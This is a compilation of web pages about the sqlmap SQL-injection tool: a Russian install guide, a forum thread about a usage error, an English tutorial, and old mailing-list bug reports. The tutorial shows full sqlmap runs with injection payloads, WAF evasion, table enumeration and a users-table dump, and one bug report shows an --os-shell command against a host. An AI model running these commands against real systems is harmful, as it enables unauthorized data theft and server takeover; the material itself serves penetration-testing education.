Давайте рассмотрим установку инстурмента SQL в системах, отличных от Kali Linux.
Sqlmap – это самый популярный инструмент для автоматизированной эксплуатации уязвимостей sql-инъекций и захвата баз данных.
Он написан на языке python и является кроссплатформенным.
Как мы знаем, в Kali Linux инструмент уже предустановлен.
Или его можно установить с помощью:
apt install sqlmap
SQLMap с Tor для анонимности
Как же установить SqlMap на Windows и RHEL-подобные Linux?
Содержание
- Установка SqlMap на CentOS, RHEL, Fedora, Rocky Linux, AlmaLinux
- Как установить и запустить Sqlmap на Windows
- 1. Скачайте и установите Python
- 2. Скачайте и установите Sqlmap
Установка SqlMap на CentOS, RHEL, Fedora, Rocky Linux, AlmaLinux
Инструмент sqlmap работает в среде python.
Поэтому перед загрузкой необходимо установить среду python, я выбрал python3, в конце концов, это новая версия, следуйте тенденции.
sudo yum install python3
После установки, инструмент sqlmap можно скачать.
wget https://codeload.github.com/sqlmapproject/sqlmap/legacy.tar.gz/master
После завершения загрузки будет сгенерирован мастер-файл по текущему пути.
команда для извлечения:
tar -zxvf master
как показано ниже:
Как установить и запустить Sqlmap на Windows
1. Скачайте и установите Python
Поскольку sqlmap написан на языке python, первое, что вам понадобится, это интерпретатор python. Скачайте интерпретатор python с сайта https://www.python.org/.
Установщики для Windows можно найти здесь:
https://www.python.org/downloads/windows/
Существует две серии python, 2.7.x и 3.3.x. Sqlmap будет работать с любой из них.
Поэтому скачайте и установите его.
2. Скачайте и установите Sqlmap
Затем скачайте zip-файл sqlmap с сайта sqlmap.org.
Распакуйте zip-файлы в любую директорию.
Запустите dos prompt и перейдите в каталог sqlmap.
Теперь запустите скрипт sqlmap.py с помощью интерпретатора python.
C:sqlmapproject-sqlmap-2defc30>python ./sqlmap.py
Если возникает ошибка при использовании аргументов:
Usage: sqlmap.py [options] sqlmap.py: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, --wizard, --shell, --update, --purge, --list-tampers or --dependencies). Use -h for basic and -hh for advanced help Press Enter to continue...
Вам надо установить системную переменную path:
set path=C:/Python27%path%
¯_(ツ)_/¯
Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.
sqlmap.py: error: missing a mandatory option
Postby notDajin »I’ve seen some people on forums with the same error, but I’ve never seen an answer
Really, ? then why did I find the answer in the results when I searched,…?
You have not really read anything, nor even tried,..
Learn how to do some searches.
The answer is in the search results, 2nd hit.
Why are you trying to use this ?
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
And it comes with a manual,…try reading it.
The error message is clear, you are not incudeing one of the required options,
the manual explains what the options are for.
Another thing :
Postby notDajin » I’m running Debian 8.6.0.
Really,….then would you please tell us how you installed this package, ?
It is not avaialble for Debian 8.6 (jessie) , it is only available for
«stretch ,testing», or «sid».
https://packages.debian.org/search?suit … rds=sqlmap
———————
https://packages.debian.org/search?suit … rds=sqlmap
Something is not adding up here, Why are you not
giveing the details accuartely,….?
If you downloaded it from the sqlmap site,(source forge) and installed
that way, Why don’t you ask them for help ?
==== edited ===
I know I am sounding rude, but the OP did not even try to do a search, or read anything ,… here is the proof, This is what the tutorial says :
This should be your results when you run the sqlmap.py script from a working installation:
Code: Select all
sqlmap/0.9 - automatic SQL injection and database takeover tool Usage: python sqlmap.py [options] sqlmap.py: error: missing a mandatory parameter ('-d', '-u', '-l', '-r', '-g', '-c', '--wizard' or '--update'), -h for help
The error is merely telling us we did not fill in the necessary parameters for a test to take place. You can repeat the command using the (-h) to get a full list of options or see the excellent online help and tutorials on the sqlmap project page.
by notDajin »I’ve seen some people on forums with the same error, but I’ve never seen an answer
That is because the OP did not even try to do a search, nor read any documentation,
and on many forums , when someone asks something that is so easily answered simply
by doing a search, the question gets ignored,….maybe that is what I should have done as well, TIP : If you wannabee a hacker/cracker, learn how to do your own searches.
Running sqlmap yourself is not difficult.
This tutorial will take you from noob to ninja with this powerful sql injection testing tool.
Sqlmap is a python based tool, which means it will usually run on any system with python. However, we like Linux and specifically Ubuntu, it simply makes it easy to get stuff done. Python comes already installed in Ubuntu. This is the same tool we use on our online sql injection test site.
To get started with sqlmap, it is a matter of downloading the tool, unpacking it, and running the command with the necessary options. As there may be Windows users amongst you, I’ll first start with how to get an Ubuntu install up and running. It is easy to get started on an Ubuntu Linux system, even if the thought of Linux sends shivering spasms of fear. Who knows, you may even like it.
Install SQLmap
Step 1: Get a Linux based Operating System
If you are going to run SQLmap on Windows with Python, make sure you have Python installed, and skip down to the next step. Otherwise, get your Linux system fired up. Either install a Linux virtual machine (Ubuntu or Kali recommended) on Windows (Virtualbox / VMware / Parrallels) or boot up your Linux desktop.
If you run Microsoft Windows as your main operating system, it is convenient and simple to run an install of Ubuntu Linux (or Kali Linux) in a virtual machine. You can then play with sqlmap, nmap, nikto and openvas along with a hundred other powerful open source security tools.
Step 2: SQLmap Installation
Python is pre-installed in Ubuntu, so all you need to do is clone the latest repository from git and start your testing.
elliot@evilcorp:~$ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev Cloning into 'sqlmap-dev'... remote: Counting objects: 633, done. remote: Compressing objects: 100% (602/602), done. remote: Total 633 (delta 170), reused 171 (delta 20), pack-reused 0 Receiving objects: 100% (633/633), 7.17 MiB | 2.44 MiB/s, done. Resolving deltas: 100% (170/170), done.
Change into the directory and run the python script to ensure all looks good.
elliot@evilcorp:~$ cd sqlmap-dev elliot@evilcorp:~/sqlmap-dev$ python sqlmap.py __H__ ___ ___[']_____ ___ ___ {1.5.2.12#dev} |_ -| . ['] | .'| . | |___|_ ["]_|_|_|__,| _| |_|V... |_| http://sqlmap.org Usage: python sqlmap.py [options] sqlmap.py: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --list-tampers, --wizard, --update, --purge-output or --dependencies), use -h for basic or -hh for advanced help
If you do not see something like the output above, make sure python is working, try python -V
to check the version and you are in the right location. Now lets move on, this was the easy part.
To get a full list of the options available run python sqlmap.py -h
.
To show advanced help and options available run python sqlmap.py -hh
Running SQLmap
Simple HTTP GET based test
In this simple test we will use a standard HTTP GET
based request against a URI with a parameter (?id=5). This will test different SQL injection methods against the id
parameter.
python sqlmap.py -u 'http://mytestsite.com/page.php?id=5'
In the results we can see the different methods used against the parameter.
___ __H__ ___ ___[']_____ ___ ___ {1.5.2.12#dev} |_ -| . ['] | .'| . | |___|_ ["]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 12:55:56 [12:55:56] [INFO] testing connection to the target URL [12:55:57] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS [12:55:58] [INFO] testing if the target URL content is stable [12:55:58] [INFO] target URL content is stable [12:55:58] [INFO] testing if GET parameter 'id' is dynamic [12:55:58] [INFO] confirming that GET parameter 'id' is dynamic [12:55:59] [INFO] GET parameter 'id' is dynamic [12:55:59] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL') [12:56:00] [INFO] testing for SQL injection on GET parameter 'id' it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y [12:56:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [12:56:18] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="hac") [12:56:18] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)' [12:56:19] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)' [12:56:19] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)' [12:56:19] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)' [12:56:20] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)' [12:56:20] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)' [12:56:21] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [12:56:21] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [12:56:21] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' [12:56:22] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' [12:56:22] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)' [12:56:22] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)' [12:56:23] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [12:56:23] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)' [12:56:24] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)' [12:56:24] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)' [12:56:25] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)' [12:56:25] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)' [12:56:25] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)' [12:56:26] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)' [12:56:26] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)' [12:56:27] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)' [12:56:27] [INFO] testing 'MySQL inline queries' [12:56:27] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)' [12:56:28] [INFO] testing 'MySQL > 5.0.11 stacked queries' [12:56:28] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)' [12:56:28] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)' [12:56:29] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)' [12:56:29] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' [12:56:30] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind' [12:56:41] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable [12:56:41] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [12:56:41] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found [12:56:41] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test [12:56:43] [INFO] target URL appears to have 3 columns in query [12:56:46] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n sqlmap identified the following injection point(s) with a total of 53 HTTP(s) requests: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 9561=9561 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id=1 AND SLEEP(5) Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: id=-6630 UNION ALL SELECT NULL,CONCAT(0x7178786271,0x79434e597a45536f5a4c695273427857546c76554854574c4f5a534f587368725142615a54456256,0x716b767a71),NULL-- mIJj --- [12:56:52] [INFO] the back-end DBMS is MySQL web application technology: Nginx, PHP 5.3.10 back-end DBMS: MySQL >= 5.0.12 [12:56:52] [INFO] fetched data logged to text files under '/home/elliot/.sqlmap/output/mytestsite' [*] shutting down at 12:56:52
Getting blocked by the Web Application Firewall — WAF
Try using a different user agent then the default sqlmap with the --randomagent
parameter.
elliot@evilcorp:~/sqlmap-dev$ python sqlmap.py -u "http://mytestsite.com/page.php?id=5" --random-agent ___ __H__ ___ ___[,]_____ ___ ___ {1.5.2.12#dev} |_ -| . [.] | .'| . | |___|_ [)]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 14:14:04 /2019-11-01/
Retrieve the Database Tables
SQLmap can be used to test and exploit SQL Injection, doing things such as extracting data from databases, updating tables, and even popping shells on remote hosts if all the ducks are in line.
Let’s retrieve the tables from the database using the SQL Injection vulnerability we confirmed above. As you will see in the output below, we can continue testing against the target without having to retest the vulnerability. SQLmap uses information it knows about the site to further exploit the target database.
To retrieve data we simply add a parameter to the previous command. By adding --tables
we can attempt to retrieve all the tables.
elliot@evilcorp:~/sqlmap-dev$ python sqlmap.py -u 'http://mytestsite.com/page.php?id=5' --tables ___ __H__ ___ ___[']_____ ___ ___ {1.5.2.12#dev} |_ -| . ['] | .'| . | |___|_ ["]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 12:59:04 [12:59:04] [INFO] resuming back-end DBMS 'mysql' [12:59:04] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 9561=9561 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id=1 AND SLEEP(5) Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: ud=-6630 UNION ALL SELECT NULL,CONCAT(0x7178786271,0x79434e597a45536f5a4c695273427857546c76554854574c4f5a534f587368725142615a54456256,0x716b767a71),NULL-- mIJj --- [12:59:05] [INFO] the back-end DBMS is MySQL web application technology: Nginx, PHP 5.3.10 back-end DBMS: MySQL >= 5.0.12 Database: books [8 tables] +---------------------------------------+ | author | | shoppingcarts | | categories | | featured | | guestbook | | pictures | | products | | users | +---------------------------------------+ Database: information_schema [28 tables] == snipped == +---------------------------------------+ | CHARACTER_SETS | | COLLATIONS | | COLLATION_CHARACTER_SET_APPLICABILITY | | COLUMNS | | TRIGGERS | | USER_PRIVILEGES | | VIEWS | +---------------------------------------+ [12:59:21] [INFO] fetched data logged to text files under '/home/elliot/.sqlmap/output/mytestsite.com' [*] shutting down at 12:59:21
Dump the data
To get data we simply extend our command. Adding -T users
will focus in on the users table where we might be able to get some credentials. Adding --dump
will tell SQLmap to grab all the data from the users table, first the columns will be enumerated and then the data will be dumped from the columns.
elliot@evilcorp:~/sqlmap-dev$ python sqlmap.py -u 'http://mytestsite.com/page.php?id=5' --tables ___ __H__ ___ ___[']_____ ___ ___ {1.5.2.12#dev} |_ -| . ['] | .'| . | |___|_ ["]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 12:59:04 [12:59:04] [INFO] resuming back-end DBMS 'mysql' [12:59:04] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- SNIP ----- Database: users Table: users [1 entry] +----------+----------------------------------+------+-------+---------+------------------------+-----------------+ | name | cart | pass | user | phone | email | address | ----------+-----------------------------------+------+-------+---------+------------------------+-----------------+ | Elliot | 55207107sfefsff8e7f2fa5ef4fa00f6 | test | test | 4563454 | fake@testtest.com | | +----------+----------------------------------+------+-------+---------+------------------------+-----------------+ [13:08:36] [INFO] table 'users' dumped to CSV file '/home/fred/.sqlmap/output/mytestsite/dump/books/users.csv' [13:08:36] [INFO] fetched data logged to text files under '/home/fred/.sqlmap/output/mytestsite' [*] shutting down at 13:08:36
SQLmap Tips — Go ninja on your SQL Injection Testing
Verbose output
When testing for SQL Injection, it is often necessary to dig into the requests manually to determine problems with the test or to confirm or even further exploit a discovered injection. Being able to increase the verbosity of your SQLmap output will help with this testing.
By increasing the verbosity to 4 you can get the HTTP requests, with 5 you also see the HTTP response headers, and 6 will show the full HTTP response. Obviously, this can get super noisy but sometimes you need to see what is happening.
Got Database Credentials?
This handy tip allows you to connect to the database directly and dump data such as users, databases, or tables. The nice thing about this is you don’t have to remember the SQL syntax for the database or have a client installed. SQLmap will do the heavy lifting acting as a Database Client to dump data.
DB Connection strings:
MySQL, Oracle, Microsoft SQL Server, PostgreSQL
DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME
SQLite, Microsoft Access
DBMS://DATABASE_FILEPATH
Popping Shells and More
SQLmap has a ridiculous number of options, and is an amazing tool for becoming one with a database. Apart from popping shells on the target host, you can send requests through tor, find injections in page responses automatically, spider sites and, of course, perform HTTP POST based testing. These examples merely scratch the surface. Find more examples on the excellent github wiki page.
SQL injection continues to be a favourite target of attackers.
Use our SQL Injection scanner to test for injectable parameters on a web URI.
Next level testing with advanced Security Vulnerability Scanners.
Trusted tools. Hosted for easy access.
-
Summary
-
Files
-
Reviews
-
Support
-
Mailing Lists
-
External Link ▾
- Donate
- Browse SVN
Menu
▾
▴
From: sql pirate <sqlpi…@go…> — 2009-06-22 13:10:14 |
Hi guys, I had the following error when running sqlmap. The error occured in version 0.6.4 and 0.7rc1. Note that I use prefix and postfix because the injection can only be done in an order by statement. In order by you cannot directly append "AND 1=1". The setup for sql injection works and was verified. Best Regards, Jan ./sqlmap.py -u " http://www.example.com/system/listinstances.nav?FORMULARNAME=listinstances&FORMULARSEGMENT=0&FLD_maxElementsListInstances=5&FLD_listInstancesOrderBy=1" -p FLD_listInstancesOrderBy --string=rowHighSmall --proxy= http://127.0.0.1:8080/--cookie="JSESSIONID=1RjDK1vK9NMkyJ7tWPWks9wTYyYz22h5pTQ2qTWVx6pQVhxC2nVg" --delay=1 --prefix="%2b(select%20case%20when%201=1" --postfix="then%201%20else%201/0%20end%20from%20dual)" --sql-query="select 'bla' from dual" /home/jan/Tools/sqlmap-0.6.4/lib/core/convert.py:27: DeprecationWarning: the md5 module is deprecated; use hashlib instead import md5 /home/jan/Tools/sqlmap-0.6.4/lib/core/convert.py:28: DeprecationWarning: the sha module is deprecated; use the hashlib module instead import sha sqlmap/0.6.4 coded by Bernardo Damele A. G. <berna...@gm...> and Daniele Bellucci <danie...@gm...> [*] starting at: 14:53:19 [14:53:19] [WARNING] the testable parameter 'FLD_listInstancesOrderBy' you provided is not into the Cookie [14:53:19] [INFO] testing connection to the target url [14:53:20] [INFO] testing if the provided string is within the target URL page content [14:53:22] [INPUT] you provided an HTTP Cookie header value. The target url provided its own Cookie within the HTTP Set-Cookie header. Do you want to continue using the HTTP Cookie values that you provided? [Y/n] Y [14:53:26] [INFO] testing if GET parameter 'FLD_listInstancesOrderBy' is dynamic [14:53:28] [INFO] confirming that GET parameter 'FLD_listInstancesOrderBy' is dynamic [14:53:31] [INFO] GET parameter 'FLD_listInstancesOrderBy' is dynamic [14:53:31] [INFO] testing sql injection on GET parameter 'FLD_listInstancesOrderBy' with 0 parenthesis [14:53:31] [INFO] testing custom injection on GET parameter 'FLD_listInstancesOrderBy' [14:53:35] [INFO] confirming custom injection on GET parameter 'FLD_listInstancesOrderBy' [14:53:37] [INFO] GET parameter 'FLD_listInstancesOrderBy' is custom injectable [14:53:37] [INFO] testing for parenthesis on injectable parameter [14:53:37] [INFO] testing MySQL [14:53:38] [WARNING] the back-end DMBS is not MySQL [14:53:38] [INFO] testing Oracle [14:53:41] [INFO] confirming Oracle [14:53:43] [INFO] the back-end DBMS is Oracle web application technology: Apache, Servlet 2.5, JSP, JSP 2.1 back-end DBMS: Oracle [14:53:43] [INFO] fetching SQL SELECT statement query output: 'select 'bla' from dual' [14:53:43] [INPUT] can the SQL query provided return multiple entries? [Y/n] n [14:53:47] [INFO] query: SELECT NVL(CAST(CHR(98)||CHR(108)||CHR(97) AS VARCHAR(4000)), CHR(32)) FROM dual [14:53:47] [INFO] retrieved: [14:53:47] [ERROR] unhandled exception in sqlmap/0.6.4, please copy the command line and the following text and send by e-mail to sqlma...@li.... The developers will fix it as soon as possible: sqlmap version: 0.6.4 Python version: 2.6.2 Operating system: linux2 Traceback (most recent call last): File "./sqlmap.py", line 81, in main start() File "/home/jan/Tools/sqlmap-0.6.4/lib/controller/controller.py", line 255, in start action() File "/home/jan/Tools/sqlmap-0.6.4/lib/controller/action.py", line 123, in action dumper.string(conf.query, conf.dbmsHandler.sqlQuery(conf.query)) File "/home/jan/Tools/sqlmap-0.6.4/plugins/generic/enumeration.py", line 1078, in sqlQuery output = inject.getValue(query, fromUser=True) File "/home/jan/Tools/sqlmap-0.6.4/lib/request/inject.py", line 364, in getValue value = __goInferenceProxy(expression, fromUser, expected) File "/home/jan/Tools/sqlmap-0.6.4/lib/request/inject.py", line 297, in __goInferenceProxy outputs = __goInferenceFields(expression, expressionFields, expressionFieldsList, payload, expected) File "/home/jan/Tools/sqlmap-0.6.4/lib/request/inject.py", line 100, in __goInferenceFields output = __goInference(payload, expressionReplaced) File "/home/jan/Tools/sqlmap-0.6.4/lib/request/inject.py", line 60, in __goInference count, value = bisection(payload, expression, length=length) File "/home/jan/Tools/sqlmap-0.6.4/lib/techniques/blind/inference.py", line 231, in bisection val = getChar(index) File "/home/jan/Tools/sqlmap-0.6.4/lib/techniques/blind/inference.py", line 101, in getChar forgedPayload = payload % (expressionUnescaped, idx, limit) ValueError: unsupported format character 'b' (0x62) at index 104 [*] shutting down at: 14:53:47 |
From: Ian P. <xs…@gm…> — 2010-05-24 02:28:11 |
sqlmap version: 0.8 Python version: 2.5.2 Operating system: linux2 Traceback (most recent call last): File "./sqlmap.py", line 77, in main start() File "/pentest/database/sqlmap/lib/controller/controller.py", line 259, in start action() File "/pentest/database/sqlmap/lib/controller/action.py", line 46, in action conf.dbmsHandler = setHandler() File "/pentest/database/sqlmap/lib/controller/handler.py", line 62, in setHandler dbmsHandler = dbmsEntry() File "/pentest/database/sqlmap/plugins/dbms/mysql/__init__.py", line 50, in __init__ Fingerprint.__init__(self) File "/pentest/database/sqlmap/plugins/dbms/mysql/fingerprint.py", line 44, in __init__ GenericFingerprint.__init__(self) AttributeError: class Fingerprint has no attribute '__init__' |
From: Miroslav Stampar <miros…@gm…> — 2010-05-24 08:13:59 |
Hi. This was fixed two months ago. Please use the latest development version from our SVN to have it fixed (svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev). Kind regards. On Mon, May 24, 2010 at 4:27 AM, Ian P. <xs...@gm...> wrote: > sqlmap version: 0.8 > Python version: 2.5.2 > Operating system: linux2 > Traceback (most recent call last): > File "./sqlmap.py", line 77, in main > start() > File "/pentest/database/sqlmap/lib/controller/controller.py", line 259, > in start > action() > File "/pentest/database/sqlmap/lib/controller/action.py", line 46, in > action > conf.dbmsHandler = setHandler() > File "/pentest/database/sqlmap/lib/controller/handler.py", line 62, in > setHandler > dbmsHandler = dbmsEntry() > File "/pentest/database/sqlmap/plugins/dbms/mysql/__init__.py", line 50, > in __init__ > Fingerprint.__init__(self) > File "/pentest/database/sqlmap/plugins/dbms/mysql/fingerprint.py", line > 44, in __init__ > GenericFingerprint.__init__(self) > AttributeError: class Fingerprint has no attribute '__init__' > > > > ------------------------------------------------------------------------------ > > > _______________________________________________ > sqlmap-users mailing list > sqlma...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B |
From: Ustupid MFU <ustup…@gm…> — 2010-05-31 03:33:46 |
which web application language does the web server support? [1] ASP (default) [2] PHP [3] JSP > 1 [23:34:10] [WARNING] unable to retrieve the web server document root please provide the web server document root [C:/Inetpub/wwwroot/]: C:/xampp/htdocs/modules/weblinks0/ [23:34:13] [INFO] retrieved web server full paths: '/modules/weblinks0/visit.php' please provide any additional web server full path to try to upload the agent [C:/Inetpub/wwwroot/]: [23:34:16] [WARNING] unable to upload the uploader agent on '/modules/weblinks0' [23:34:16] [ERROR] unhandled exception in sqlmap/0.8, please copy the command line and the following text and send by e-mail to sqlma...@li.... The developer will fix it as soon as possible: sqlmap version: 0.8 Python version: 2.6.5 Operating system: linux2 Traceback (most recent call last): File "./sqlmap.py", line 77, in main start() File "/.rnd2/pa/sqlmap/lib/controller/controller.py", line 259, in start action() File "/.rnd2/pa/sqlmap/lib/controller/action.py", line 141, in action conf.dbmsHandler.osShell() File "/.rnd2/pa/sqlmap/plugins/generic/takeover.py", line 98, in osShell self.initEnv(web=web) File "/.rnd2/pa/sqlmap/lib/takeover/abstraction.py", line 155, in initEnv self.webInit() File "/.rnd2/pa/sqlmap/lib/takeover/web.py", line 189, in webInit uplPage, _ = Request.getPage(url=self.webUploaderUrl, direct=True, raise404=False) File "/.rnd2/pa/sqlmap/lib/request/connect.py", line 126, in getPage conn = urllib2.urlopen(req) File "/usr/local/lib/python2.6/urllib2.py", line 126, in urlopen return _opener.open(url, data, timeout) File "/usr/local/lib/python2.6/urllib2.py", line 391, in open response = self._open(req, data) File "/usr/local/lib/python2.6/urllib2.py", line 409, in _open '_open', req) File "/usr/local/lib/python2.6/urllib2.py", line 369, in _call_chain result = func(*args) File "/usr/local/lib/python2.6/urllib2.py", line 1161, in http_open return self.do_open(httplib.HTTPConnection, req) File "/usr/local/lib/python2.6/urllib2.py", line 1107, in do_open h = http_class(host, timeout=req.timeout) # will parse host:port File "/usr/local/lib/python2.6/httplib.py", line 657, in __init__ self._set_hostport(host, port) File "/usr/local/lib/python2.6/httplib.py", line 682, in _set_hostport raise InvalidURL("nonnumeric port: '%s'" % host[i+1:]) InvalidURL: nonnumeric port: '' [*] shutting down at: 23:34:16 ./sqlmap.py -u 'http://somehost/modules/weblinks0/visit.php?lid=44' --os-shell --msf-path /opt/metasploit3/msf3 |
From: <ja…@ev…> — 2010-05-31 11:41:10 |
Ancient SQLmap. Update. On Mon, 31 May 2010 06:33:39 +0300, Ustupid MFU <ustup...@gm...> wrote: > which web application language does the web server support?[1] ASP > (default)[2] PHP[3] JSP> 1[23:34:10] [WARNING] unable to retrieve the web > server document root please provide the web server document root > [C:/Inetpub/wwwroot/]: C:/xampp/htdocs/modules/weblinks0/[23:34:13] > [INFO] retrieved web server full paths: > '/modules/weblinks0/visit.php'please provide any additional web server > full path to try to upload the agent [C:/Inetpub/wwwroot/]: [23:34:16] > [WARNING] unable to upload the uploader agent on > '/modules/weblinks0'[23:34:16] [ERROR] unhandled exception in sqlmap/0.8, > please copy the command line and the following text and send by e-mail to > sqlma...@li... [1]. The developer will fix it as soon > as possible: sqlmap version: 0.8Python version: 2.6.5Operating system: > linux2Traceback (most recent call last): File "./sqlmap.py", line 77, > in main start() File > "/.rnd2/pa/sqlmap/lib/controller/controller.py", line 259, in start > action() File "/.rnd2/pa/sqlmap/lib/controller/action.py", line 141, > in action conf.dbmsHandler.osShell() File > "/.rnd2/pa/sqlmap/plugins/generic/takeover.py", line 98, in osShell > self.initEnv(web=web) File > "/.rnd2/pa/sqlmap/lib/takeover/abstraction.py", line 155, in initEnv > self.webInit() File "/.rnd2/pa/sqlmap/lib/takeover/web.py", line > 189, in webInit uplPage, _ = > Request.getPage(url=self.webUploaderUrl, direct=True, > raise404=False) File "/.rnd2/pa/sqlmap/lib/request/connect.py", line > 126, in getPage conn = urllib2.urlopen(req) File > "/usr/local/lib/python2.6/urllib2.py", line 126, in urlopen return > _opener.open(url, data, timeout) File > "/usr/local/lib/python2.6/urllib2.py", line 391, in open response > = self._open(req, data) File "/usr/local/lib/python2.6/urllib2.py", > line 409, in _open '_open', req) File > "/usr/local/lib/python2.6/urllib2.py", line 369, in _call_chain > result = func(*args) File "/usr/local/lib/python2.6/urllib2.py", > line 1161, in http_open return self.do_open(httplib.HTTPConnection, > req) File "/usr/local/lib/python2.6/urllib2.py", line 1107, in do_open > h = http_class(host, timeout=req.timeout) # will parse > host:port File "/usr/local/lib/python2.6/httplib.py", line 657, in > __init__ self._set_hostport(host, port) File > "/usr/local/lib/python2.6/httplib.py", line 682, in _set_hostport > raise InvalidURL("nonnumeric port: '%s'" % host[i+1:])InvalidURL: > nonnumeric port: '' > [*] shutting down at: 23:34:16 > ./sqlmap.py -u 'http://somehost/modules/weblinks0/visit.php?lid=44 [2]' > --os-shell --msf-path /opt/metasploit3/msf3 > > Links: > ------ > [1] mailto:sqlma...@li... > [2] http://somehost/modules/weblinks0/visit.php?lid=44 |
From: Ustupid MFU <ustup…@gm…> — 2010-05-31 20:02:36 |
